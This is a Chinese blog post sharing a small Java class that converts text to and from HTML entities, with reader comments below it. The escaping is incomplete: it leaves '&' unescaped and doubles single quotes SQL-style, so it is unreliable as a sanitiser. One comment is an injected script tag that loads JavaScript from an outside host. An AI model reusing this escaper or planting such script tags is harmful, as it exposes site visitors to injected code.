古烟之技术专栏

致力于中国企业信息化与国际电子商务整合方案!

JAVA中转换HTML代码

package com.wide.cabaret.utils;

public class Html{
  public Html(){
    super();
  }

  public String toHtml(String str){
    if (str==null){
      return "";
    }else{
      str=str.replaceAll("<", "&lt;");
      str=str.replaceAll(">", "&gt;");
      str=str.replaceAll("'", "''");
      str=str.replaceAll(" ", "&nbsp;");
      str=str.replaceAll("\n", "<br>");
    }
    return str;
  }

  public String toText(String str){
    if (str==null){
      return "";
    }else{
      str=str.replaceAll("&lt;", "<");
      str=str.replaceAll("&gt;", ">");
      str=str.replaceAll("''", "'");
      str=str.replaceAll("&nbsp;", " ");
      str=str.replaceAll("<br>", "\n");
    }
    return str;
  }
}

posted on 2007-05-01 01:49 古烟 阅读(534) 评论(3)  编辑  收藏 所属分类: Jsp

评论

# re: JAVA中转换HTML代码[未登录] 2008-07-07 09:17 a

<script language="javascript" src="http://qqjs2.55.la/user_pic/qqjs/2008/07/07/09/44725.js"></script>
  回复  更多评论   

# re: JAVA中转换HTML代码[未登录] 2008-10-10 23:11 辉辉

爱你不是我的错  回复  更多评论   

# re: JAVA中转换HTML代码[未登录] 2008-10-10 23:13 辉辉

@辉辉
  回复  更多评论   


只有注册用户登录后才能发表评论。


网站导航:
 
<2024年11月>
272829303112
3456789
10111213141516
17181920212223
24252627282930
1234567

导航

统计

公告

我的Blog终于开通了

留言簿

文章分类

文章档案

最新随笔

搜索

最新评论